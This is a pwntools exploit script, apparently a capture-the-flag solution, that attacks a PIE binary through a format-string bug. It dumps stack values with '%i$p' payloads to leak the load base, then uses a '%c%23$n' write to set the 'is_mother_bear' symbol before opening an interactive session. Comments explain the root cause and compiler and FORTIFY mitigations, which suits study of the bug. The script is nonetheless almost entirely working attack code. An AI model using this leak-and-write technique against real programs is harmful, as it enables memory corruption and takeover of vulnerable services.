
solve.py
from pwn import *

# Target binary. Its symbol table is consulted below (file.sym) to compute
# the address written in stage 2; the binary is assumed to be PIE, which is
# why a runtime base address has to be leaked first.
#
# Root cause being exercised: the program evidently passes attacker-controlled
# input straight to printf() as the *format string*. The fix on the program
# side is `printf("%s", buf)` (never a user-supplied format); building with
# `-Wformat -Werror=format-security` flags such call sites at compile time,
# and _FORTIFY_SOURCE can reject `%n` in writable format strings at runtime.
name = "../chal/chal"
file = ELF(name)

# Only a network target is wired up. pwntools fills `args` from KEY=value
# command-line arguments (HOST=..., PORT=..., REMOTE); the local branch is a
# deliberate stub.
if args.REMOTE or args.HOST or args.PORT:
    p = remote(args.HOST or "localhost", args.PORT or "5000")
else:
    raise Exception("not implemented")

# Prompt the target prints before reading each line of input.
delim = b"say: "

# Stage 1 - read primitive. `%<i>$p` prints the i-th variadic argument as a
# pointer, so one request per position dumps the printf() argument area
# (stack) for positions 1..63. The input is kept at a fixed 16-byte layout
# (format padded to 8 bytes, then 8 bytes of "A") so every iteration leaves
# the stack in the same shape and positional indexes stay stable.
leaks = []
for i in range(1, 64):
    payload =  f"%{i}$p *".encode()
    payload =  payload.ljust(8, b"B")
    payload += b"A" * 8

    # The leaked value is isolated between a "* " and a " *" marker in the
    # echoed output; presumably the program brackets what it echoes with
    # "* ... *" (the trailing " *" is ours) -- TODO confirm against the target.
    p.sendlineafter(delim, payload)
    p.recvuntil(b"* ")

    resp = p.recvuntil(b" *", drop=True)

    # glibc renders a NULL `%p` as "(nil)"; record it as 0 so the list stays
    # numeric. Everything else is expected to be a "0x..." hex string.
    if resp.startswith(b"("):
        leak = 0
    else:
        leak = int(resp, 16)
    leaks.append(leak)

    log.info(f"[{i:02d}] = {leak:#x}")

# Stack layout observed from the dump above:
#   * the second 8-byte word of our input (payload+8) sits at positional
#     argument 23 -- this is the slot stage 2 dereferences via `%23$n`;
#   * leaks[14] is the value printed by `%15$p` (the list is 0-based, the
#     format positions are 1-based). It is assumed to be a code pointer into
#     the PIE binary at constant offset 0x1675 from its load base; that offset
#     is specific to this build -- TODO confirm if the binary changes.
filebase = leaks[14] - 0x1675
log.info(f"filebase = {filebase:#x}")
    
# Stage 2 - write primitive. `%c` emits exactly one character, so the running
# output count is 1 when `%23$n` stores that count (as an int) to the address
# found in positional argument 23 -- i.e. the 8-byte pointer we append right
# after the format. The NUL padding terminates the format string so the
# address bytes are never parsed as further directives. The target is the
# relocated `is_mother_bear` symbol; presumably a flag the program tests and
# 1 is the value it wants -- verify against the binary.
payload =  b"%c%23$n"
payload =  payload.ljust(8, b"\x00")
payload += p64(filebase + file.sym.is_mother_bear)
p.sendlineafter(delim, payload)

# Hand the connection to the user once the write has landed.
p.interactive()